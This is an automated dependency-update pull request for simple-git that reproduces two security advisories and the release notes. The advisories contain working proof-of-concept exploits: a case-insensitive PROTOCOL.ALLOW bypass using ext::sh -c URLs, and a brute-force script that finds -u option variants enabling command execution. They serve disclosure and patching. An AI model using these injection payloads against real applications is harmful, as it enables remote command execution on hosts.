fix(deps): update dependency simple-git to ~3.36.0 [security]

[renovate]

This PR contains the following updates:

Package	Change	Age	Confidence
simple-git (source)	~3.15.0 → ~3.36.0

---

simple-git has blockUnsafeOperationsPlugin bypass via case-insensitive protocol.allow config key enables RCE

CVE-2026-28292 / GHSA-r275-fr43-pm7q

More information

Details

Summary

The blockUnsafeOperationsPlugin in simple-git fails to block git protocol
override arguments when the config key is passed in uppercase or mixed case.
An attacker who controls arguments passed to git operations can enable the
ext:: protocol by passing -c PROTOCOL.ALLOW=always, which executes an
arbitrary OS command on the host machine.

---

Details

The preventProtocolOverride function in
simple-git/src/lib/plugins/block-unsafe-operations-plugin.ts (line 24)
checks whether a -c argument configures protocol.allow using this regex:

if (!/^\s*protocol(.[a-z]+)?.allow/.test(next)) {
   return;
}

This regex is case-sensitive. Git treats config key names
case-insensitively — it normalises them to lowercase internally.
As a result, passing PROTOCOL.ALLOW=always, Protocol.Allow=always,
or any mixed-case variant is not matched by the regex, the check
returns without throwing, and git is spawned with the unsafe argument.

Verification that git normalises the key:

$ git -c PROTOCOL.ALLOW=always config --list | grep protocol
protocol.allow=always

The fix is a single character — add the /i flag:

// Before (vulnerable):
if (!/^\s*protocol(.[a-z]+)?.allow/.test(next)) {

// After (fixed):
if (!/^\s*protocol(.[a-z]+)?.allow/i.test(next)) {

---

poc.js

/**
 * Proof of Concept — simple-git preventProtocolOverride Case-Sensitivity Bypass
 *
 * CVE-2022-25912 was fixed in simple-git@3.15.0 by adding a regex check
 * that blocks `-c protocol.*.allow=always` from being passed to git commands.
 * The regex is case-sensitive. Git treats config key names case-insensitively.
 * Passing `-c PROTOCOL.ALLOW=always` bypasses the check entirely.
 *
 * Affected : simple-git >= 3.15.0 (all versions with the fix applied)
 * Tested on: simple-git@3.32.2, Node.js v23.11.0, git 2.39.5
 * Reporter : CodeAnt AI Security Research (securityreseach@codeant.ai)
 */

const simpleGit = require('simple-git');
const fs = require('fs');

const SENTINEL = '/tmp/pwn-codeant';

// Clean up from any previous run
try { fs.unlinkSync(SENTINEL); } catch (_) {}

const git = simpleGit();

// ── Original CVE-2022-25912 vector — BLOCKED by the 2022 fix ────────────────
// This is the exact PoC Snyk used to report CVE-2022-25912.
// It is correctly blocked by preventProtocolOverride in block-unsafe-operations-plugin.ts.
git.clone('ext::sh -c touch% /tmp/pwn-original% >&2', '/tmp/example-new-repo', [
  '-c', 'protocol.ext.allow=always',   // lowercase — caught by regex
]).catch((e) => {
  console.log('ext:: executed:poc', fs.existsSync(SENTINEL) ? 'PWNED — ' + SENTINEL + ' created' : 'not created');
  console.error(e);
});

// ── Bypass — PROTOCOL.ALLOW=always (uppercase) ──────────────────────────────
// The fix regex /^\s*protocol(.[a-z]+)?.allow/ is case-sensitive.
// Git normalises config key names to lowercase internally.
// Uppercase variant passes the check; git enables ext:: and executes the command.
git.clone('ext::sh -c touch% ' + SENTINEL + '% >&2', '/tmp/example-new-repo-2', [
  '-c', 'PROTOCOL.ALLOW=always',       // uppercase — NOT caught by regex
]).catch((e) => {
  console.log('ext:: executed:', fs.existsSync(SENTINEL) ? 'PWNED — ' + SENTINEL + ' created' : 'not created');
  console.error(e);
});

// ── Real-world scenario ──────────────────────────────────────────────────────
// An application cloning a legitimate repository with user-controlled customArgs.
// Attacker supplies PROTOCOL.ALLOW=always alongside a malicious ext:: URL.
// The application intends to clone https://github.com/CodeAnt-AI/codeant-quality-gates
// but the injected argument enables ext:: and the real URL executes the command instead.
//
// Legitimate usage (what the app expects):
//   simpleGit().clone('https://github.com/CodeAnt-AI/codeant-quality-gates',
//                     '/tmp/codeant-quality-gates', userArgs)
//
// Attacker-controlled scenario (what actually runs when args are not sanitised):
const LEGITIMATE_URL = 'https://github.com/CodeAnt-AI/codeant-quality-gates';
const CLONE_DEST     = '/tmp/codeant-quality-gates';
const SENTINEL_RW    = '/tmp/pwn-realworld';
try { fs.unlinkSync(SENTINEL_RW); } catch (_) {}

const userArgs   = ['-c', 'PROTOCOL.ALLOW=always'];
const attackerURL = 'ext::sh -c touch% ' + SENTINEL_RW + '% >&2';

simpleGit().clone(
  attackerURL,   // should have been LEGITIMATE_URL
  CLONE_DEST,
  userArgs
).catch(() => {
  console.log('real-world scenario [target: ' + LEGITIMATE_URL + ']:',
    fs.existsSync(SENTINEL_RW) ? 'PWNED — ' + SENTINEL_RW + ' created' : 'not created');
});

---

Test Results

Vector 1 — Original CVE-2022-25912 (protocol.ext.allow=always, lowercase)

Result: BLOCKED ✅

The original Snyk PoC payload using lowercase protocol.ext.allow=always is correctly intercepted by preventProtocolOverride before git is invoked. A GitPluginError is thrown immediately and the sentinel file is never created.

Output:

ext:: executed:poc not created
GitPluginError: Configuring protocol.allow is not permitted without enabling allowUnsafeExtProtocol
    at preventProtocolOverride (.../simple-git/dist/cjs/index.js:1228:9)
    at .../simple-git/dist/cjs/index.js:1266:40
    at Array.forEach (<anonymous>)
    at Object.action (.../simple-git/dist/cjs/index.js:1264:12)
    at PluginStore.exec (.../simple-git/dist/cjs/index.js:1489:29)
    at GitExecutorChain.attemptRemoteTask (.../simple-git/dist/cjs/index.js:1881:36)
    at GitExecutorChain.attemptTask (.../simple-git/dist/cjs/index.js:1865:88) {
  task: {
    commands: [
      'clone',
      '-c',
      'protocol.ext.allow=always',
      'ext::sh -c touch% /tmp/pwn-original% >&2',
      '/tmp/example-new-repo'
    ],
    format: 'utf-8',
    parser: [Function: parser]
  },
  plugin: 'unsafe'
}

---

Vector 2 — Uppercase bypass (PROTOCOL.ALLOW=always)

Result: BYPASSED ⚠️ — RCE confirmed

The preventProtocolOverride regex /^\s*protocol(.[a-z]+)?.allow/ is case-sensitive. PROTOCOL.ALLOW=always (uppercase) passes the check without error. Git normalises config key names to lowercase internally, enabling the ext:: protocol. The injected shell command executes before git errors on the missing repository stream.

Output:

ext:: executed: PWNED — /tmp/pwn-codeant created
GitError: Cloning into '/tmp/example-new-repo-2'...
fatal: Could not read from remote repository.

Please make sure you have the correct access rights
and the repository exists.

    at Object.action (.../simple-git/dist/cjs/index.js:1440:25)
    at PluginStore.exec (.../simple-git/dist/cjs/index.js:1489:29) {
  task: {
    commands: [
      'clone',
      '-c',
      'PROTOCOL.ALLOW=always',
      'ext::sh -c touch% /tmp/pwn-codeant% >&2',
      '/tmp/example-new-repo-2'
    ],
    format: 'utf-8',
    parser: [Function: parser]
  }
}

/tmp/pwn-codeant was created by the git subprocess — command execution confirmed.

---

Vector 3 — Real-world scenario (target: https://github.com/CodeAnt-AI/codeant-quality-gates)

Result: BYPASSED ⚠️ — RCE confirmed

An application passes user-controlled customArgs to simpleGit().clone(). The attacker injects PROTOCOL.ALLOW=always and substitutes a malicious ext:: URL in place of the intended repository URL. The plugin does not block the uppercase variant; git enables ext:: and executes the payload before the application can detect the failure.

Output:

real-world scenario [target: https://github.com/CodeAnt-AI/codeant-quality-gates]: PWNED — /tmp/pwn-realworld created

/tmp/pwn-realworld was created — arbitrary command execution in a realistic application context confirmed.

---

Summary

#	Vector	Payload	Sentinel file	Result
1	CVE-2022-25912 original	protocol.ext.allow=always (lowercase)	not created	Blocked ✅
2	Case-sensitivity bypass	PROTOCOL.ALLOW=always (uppercase)	/tmp/pwn-codeant created	RCE ⚠️
3	Real-world app scenario	PROTOCOL.ALLOW=always + attacker URL	/tmp/pwn-realworld created	RCE ⚠️

The case-sensitive regex in preventProtocolOverride blocks protocol.*.allow but does not account for uppercase or mixed-case variants. Git accepts all variants identically due to case-insensitive config key normalisation, allowing full bypass of the protection in all versions of simple-git that carry the 2022 fix.

/tmp/pwned is created by the git subprocess via the ext:: protocol.

All of the following bypass the check:

Argument passed via -c	Regex matches?	Git honours it?
protocol.allow=always	✅ blocked	✅
PROTOCOL.ALLOW=always	❌ bypassed	✅
Protocol.Allow=always	❌ bypassed	✅
PROTOCOL.allow=always	❌ bypassed	✅
protocol.ALLOW=always	❌ bypassed	✅

---

Impact

Any application that passes user-controlled values into the customArgs
parameter of clone(), fetch(), pull(), push() or similar simple-git
methods is vulnerable to arbitrary command execution on the host machine.

The ext:: git protocol executes an arbitrary binary as a remote helper.
With protocol.allow=always enabled, an attacker can run any OS command
as the process user — full read, write and execution access on the host.

Severity

• CVSS Score: 9.8 / 10 (Critical)
• Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

References

• https://github.com/steveukx/git-js/commit/f7042088aa2dac59e3c49a84d7a2f4b26048a257
• https://www.codeant.ai/security-research/security-research-simple-git-remote-code-execution-cve-2026-28292
• https://github.com/steveukx/git-js/security/advisories/GHSA-r275-fr43-pm7q
• https://nvd.nist.gov/vuln/detail/CVE-2026-28292
• https://www.codeant.ai/security-research/simple-git-remote-code-execution-cve-2026-28292
• https://github.com/advisories/GHSA-r275-fr43-pm7q

This data is provided by the GitHub Advisory Database (CC-BY 4.0).

---

simple-git Affected by Command Execution via Option-Parsing Bypass

CVE-2026-28291 / GHSA-jcxm-m3jx-f287

More information

Details

Summary

simple-git enables running native Git commands from JavaScript. Some commands accept options that allow executing another command; because this is very dangerous, execution is denied unless the user explicitly allows it. This vulnerability allows a malicious actor who can control the options to execute other commands even in a “safe” state where the user has not explicitly allowed them. The vulnerability was introduced by an incorrect patch for CVE-2022-25860. It is likely to affect all versions prior to and including 3.28.0.

Detail

This vulnerability was introduced by an incorrect patch for CVE-2022-25860.

It was reproduced in the following environment:

WSL Docker
node: v22.19.0
git: git version 2.39.5
simple-git: 3.28.0

The issue was not reproduced on Windows 11.

The -u option, like --upload-pack, allows a command to be executed.

Currently, the -u and --upload-pack options are blocked in the file simple-git/src/lib/plugins/block-unsafe-operations-plugin.ts.

function preventUploadPack(arg: string, method: string) {
   if (/^\s*--(upload|receive)-pack/.test(arg)) {
      throw new GitPluginError(
         undefined,
         'unsafe',
         `Use of --upload-pack or --receive-pack is not permitted without enabling allowUnsafePack`
      );
   }

   if (method === 'clone' && /^\s*-u\b/.test(arg)) {
      throw new GitPluginError(
         undefined,
         'unsafe',
         `Use of clone with option -u is not permitted without enabling allowUnsafePack`
      );
   }

   if (method === 'push' && /^\s*--exec\b/.test(arg)) {
      throw new GitPluginError(
         undefined,
         'unsafe',
         `Use of push with option --exec is not permitted without enabling allowUnsafePack`
      );
   }
}

However, the problem is that command option parsing is quite flexible.

By brute forcing, I found various options that bypass the -u check.

[
  '--u', '--u',
  '-4u', '-6u',
  '-lu', '-nu',
  '-qu', '-su',
  '-vu'
]

All of the above are three-character options that allow command execution. They enable execution even when allowUnsafePack is explicitly set to false.

The depressing fact is that the options I found are probably only a tiny fraction of all possible option formats that enable command execution. In addition to the -u option, there is also the --upload-pack option and others, and some of the options I found can probably be extended to arbitrary length. Considering this, the number of option variants that enable command execution is probably infinite.

Therefore, I could not find an effective way to block all such cases. Personally, I think it is virtually impossible to block this vulnerability completely. To fully block it, one would have to faithfully emulate Git’s option parsing rules, and it’s doubtful whether that is feasible.

Just in case, I’ll share the brute-force code I used to find options that enable command execution.

const fs = require('fs');
const simpleGit = require('simple-git');

const TMP_DIR = './pwned/';
const ITER = 256;

function cleanTmpDir() {
    if (fs.existsSync(TMP_DIR)) {
        fs.rmSync(TMP_DIR, { recursive: true, force: true });
    }
    fs.mkdirSync(TMP_DIR, { recursive: true });
}

function getPwnedFiles() {
    const found = [];
    for (let i = 0; i < ITER; i++) {
        const fname1 = `${TMP_DIR}1_${i}`;
        const fname2 = `${TMP_DIR}2_${i}`;
        const fname3 = `${TMP_DIR}3_${i}`;
        if (fs.existsSync(fname1)) found.push(String.fromCharCode(i) + '-u');
        if (fs.existsSync(fname2)) found.push('-' + String.fromCharCode(i) + 'u');
        if (fs.existsSync(fname3)) found.push('-u' + String.fromCharCode(i));
    }
    return found;
}

async function runTest(runIdx) {
    const git = simpleGit();
    // 1. `${~}-u` Pattern
    for (let i = 0; i < ITER; i++) {
        try {
            await git.clone('./testrepo1', './testrepo2', [String.fromCharCode(i) + '-u', `sh -c \"touch ${TMP_DIR}1_${i}\"`]);
        } catch {}
    }
    // 2. `-${~}u` Pattern
    for (let i = 0; i < ITER; i++) {
        try {
            await git.clone('./testrepo1', './testrepo2', ['-' + String.fromCharCode(i) + 'u', `sh -c \"touch ${TMP_DIR}2_${i}\"`]);
        } catch {}
    }
    // 3. `-u${~}` Pattern
    for (let i = 0; i < ITER; i++) {
        try {
            await git.clone('./testrepo1', './testrepo2', ['-u' + String.fromCharCode(i), `sh -c \"touch ${TMP_DIR}3_${i}\"`]);
        } catch {}
    }
}

async function main() {
    cleanTmpDir();
    await runTest();

    const found = getPwnedFiles();
    
    console.log(found);
}

main();

PoC

The environment in which I succeeded is as follows. As long as the OS remains Linux, I suspect it will succeed reliably despite considerable variation in other factors.

WSL Docker
node: v22.19.0
git: git version 2.39.5
simple-git: 3.28.0

Create any git repository inside the testrepo1 folder. A very simple repository with a single commit and a single file is fine.

Run the following:

const { simpleGit } = require('simple-git');

async function main() {
    const git = await simpleGit({ unsafe: { allowUnsafePack: false } });
    await git.clone('./testrepo1', './testrepo2', [`-vu sh -c \"touch /tmp/pwned\"`]);
}

main();

This PoC explicitly configures allowUnsafePack to false. Of course, the same vulnerability occurs even without this option. An error is the expected behavior.

Check /tmp to confirm that pwned has been created.
If it failed, try replacing -vu with a different option from the list.

Impact

This vulnerability is likely to affect all versions prior to and including 3.28.0. This is because it appears to be a continuation of the series of four vulnerabilities previously found in simple-git (CVE-2022-24433, CVE-2022-24066, CVE-2022-25912, CVE-2022-25860).

Severity

• CVSS Score: 8.1 / 10 (High)
• Vector String: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

References

• https://github.com/steveukx/git-js/security/advisories/GHSA-jcxm-m3jx-f287
• https://github.com/steveukx/git-js/blob/789c13ebabcf18ebe0b3a0c88ebb4037dede42e3/simple-git/src/lib/plugins/block-unsafe-operations-plugin.ts#L26
• https://www.cve.org/CVERecord?id=CVE-2022-25860
• https://nvd.nist.gov/vuln/detail/CVE-2026-28291
• https://github.com/steveukx/git-js/commit/1effd8e5012a5da05a9776512fac3e39b11f2d2d
• https://github.com/steveukx/git-js/releases/tag/simple-git%403.32.0
• https://github.com/advisories/GHSA-jcxm-m3jx-f287

This data is provided by the GitHub Advisory Database (CC-BY 4.0).

---

Release Notes

steveukx/git-js (simple-git)

v3.36.0

Compare Source

Minor Changes

• 89a2294: Extend known exploitable configuration keys and per-task environment variables.

  Note - ParsedVulnerabilities from argv-parser is removed in favour of a readonly array of Vulnerability to match usage in simple-git, rolled into the new vulnerabilityCheck for simpler access to the identified issues.

  Thanks to @​zebbern for identifying the need to block core.fsmonitor.
  Thanks to @​kodareef5 for identifying the need to block GIT_CONFIG_COUNT environment variables and --template / merge related config.

Patch Changes

• 1ad57e8: Remove conflicting node:buffer import
• Updated dependencies [89a2294]
• Updated dependencies [675570a]
  • @​simple-git/argv-parser@​1.1.0
  • @​simple-git/args-pathspec@​1.0.3

v3.35.2

Compare Source

Patch Changes

• 0cf9d8c: Improvements for mono-repo publishing pipeline
• Updated dependencies [0cf9d8c]
  • @​simple-git/args-pathspec@​1.0.2
  • @​simple-git/argv-parser@​1.0.3

v3.35.1

Compare Source

Patch Changes

• 0de400e: Update monorepo version handling during publish
• Updated dependencies [0de400e]
  • @​simple-git/argv-parser@​1.0.2

v3.35.0

Compare Source

Minor Changes

• 3d8708b: Updating publish config

Patch Changes

• Updated dependencies [3d8708b]
  • @​simple-git/args-pathspec@​1.0.1
  • @​simple-git/argv-parser@​1.0.1

v3.34.0

Compare Source

Minor Changes

• 2b68331: Revised dependency tree to add helper modules as dependencies in main simple-git

Patch Changes

• 2e1f51c: Enhances scanning of arguments before passing on to the spawned child_process.

  Caters for -c flags prefixing the git task (used when setting global inline config) and suffixing with either -c, --config or --config-env. Detects git config operations that write to the configuration.

• Updated dependencies [2e1f51c]

  • @​simple-git/args-pathspec@​1.0.0
  • @​simple-git/argv-parser@​1.0.0

v3.33.0

Compare Source

Minor Changes

• a263635: Use pathspec wrappers for remote and local paths when running either git.clone or git.mirror to
  avoid leaving them less open for unexpected outcomes when passing unsanitised data into these tasks.

Patch Changes

• e253a0d: Enhanced git -c checks in unsafe plugin.

  Thanks to @​JohannesLks for identifying the issue

v3.32.3

Compare Source

Patch Changes

• f704208: Enhanced protocol.allow checks in allowUnsafeExtProtocol handling.

  Thanks to @​CodeAnt-AI-Security for identifying the issue

v3.32.2

Compare Source

Patch Changes

• 8d02097: Enhanced clone unsafe switch detection.

v3.32.1

Compare Source

Patch Changes

• 23b070f: Fix regex for detecting unsafe clone options

  Thanks to @​stevenwdv for reporting this issue.

v3.32.0

Compare Source

Minor Changes

• 1effd8e: Enhances the unsafe plugin to block additional cases where the -u switch may be disguised
  along with other single character options.

  Thanks to @​JuHwiSang for identifying this as vulnerability.

Patch Changes

• d5fd4fe: Use task runner for logging use of deprecated (already no-op) functions.

v3.31.1

Compare Source

Patch Changes

• a44184f: Resolve NPM publish steps

v3.30.0

Compare Source

Minor Changes

• bc77774: Correctly identify current branch name when using git.status in a cloned empty repo.

  Previously git.status would report the current branch name as No. Thank you to @​MaddyGuthridge for identifying this issue.

v3.29.0

Compare Source

Minor Changes

• 240ec64: Support for absolute paths on Windows when using git.checkIngore, previously Windows would report
  paths with duplicate separators \\\\ between directories.

  Following this change all paths returned from git.checkIgnore will be normalized through node:path,
  this should have no impact on non-windows users where the git binary doesn't wrap absolute paths with
  quotes.

  Thanks to @​Maxim-Mazurok for reporting this issue.

• 9872f84: Support the use of git.branch(['--show-current']) to limit the branch list to only the current branch.

  Thanks to @​peterbe for pointing out the use-case.

• 5736bd8: Change to biome for lint and format

v3.28.0

Compare Source

Minor Changes

• 2adf47d: Allow repeating git options like {'--opt': ['value1', 'value2']}

v3.27.0

Compare Source

Minor Changes

• 52f767b: Add similarity to the DiffResultNameStatusFile interface used when fetching log/diff with the --name-status option.
• 739b0d9: Diff summary includes original name of renamed files when run wiht the --name-status option.
• bc90e7e: Fixes an issue with reporting name changes in the files array returned by git.status.
  Thank you @​mark-codesphere for the contribution.

Patch Changes

• 03e1c64: Resolve error in log parsing when fields have empty values.

v3.26.0

Compare Source

Minor Changes

• 28d545b: Upgrade build tools and typescript

v3.25.0

Compare Source

Minor Changes

• 0a5378d: Add support for parsing count-objects

Patch Changes

• 4aceb15: Upgrade dependencies and build tools

v3.24.0

Compare Source

Minor Changes

• c355317: Enable the use of a two part custom binary

v3.23.0

Compare Source

Minor Changes

• 9bfdf08: Bump package manager from yarn v1 to v4

Patch Changes

• 8a3118d: Fixed a performance issue when parsing stat diff summaries
• 9f1a174: Update build tools and workflows for Yarn 4 compatibility

v3.22.0

Compare Source

Minor Changes

• df14065: add status to DiffResult when using --name-status

v3.21.0

Compare Source

Minor Changes

• 709d80e: Add firstCommit utility interface

Patch Changes

• b4ab430: Add trailing callback support to git.firstCommit
• d3f9320: chore(deps): bump @​babel/traverse from 7.9.5 to 7.23.2
• b76857f: chore(deps): bump axios from 1.1.3 to 1.6.1

v3.20.0

Compare Source

Minor Changes

• 2eda817: Use pathspec in git.log to allow use of previously deleted files in file argument

v3.19.1

Compare Source

Patch Changes

• 2ab1936: keep path splitter without path specs

v3.19.0

Compare Source

Minor Changes

• f702b61: Create a utility to append pathspec / file lists to tasks through the TaskOptions array/object

v3.18.0

Compare Source

Minor Changes

• 5100f04: Add new interface for showBuffer to allow using git show on binary files.

Patch Changes

• f54cd0d: Examples and documentation for outputHandler

v3.17.0

Compare Source

Minor Changes

• a63cfc2: Timeout plugin can now be configured to ignore data on either stdOut or stdErr in the git process when determining whether to kill the spawned process.

v3.16.1

Compare Source

Patch Changes

• 066b228: Fix overly permissive regex in push parser

v3.16.0

Compare Source

Minor Changes

• 97fde2c: Support the use of -B in place of the default -b in checkout methods
• 0a623e5: Adds vulnerability detection to prevent use of --upload-pack and --receive-pack without explicitly opting in.

Patch Changes

• ec97a39: Include restricting the use of git push --exec with other allowUnsafePack exclusions, thanks to @​stsewd for the suggestion.

---

Configuration

📅 Schedule: (UTC)

• Branch creation
  • ""
• Automerge
  • At any time (no schedule defined)

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

♻ Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

---

• If you want to rebase/retry this PR, check this box

---

This PR was generated by Mend Renovate. View the repository job log.